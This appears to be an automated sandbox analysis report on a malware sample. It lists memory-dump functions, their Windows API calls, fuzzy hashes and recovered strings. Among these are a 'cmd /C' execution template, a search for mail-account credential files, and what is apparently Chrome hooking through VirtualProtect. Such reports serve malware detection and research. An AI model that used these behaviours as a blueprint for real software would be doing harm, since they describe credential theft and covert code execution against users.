APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
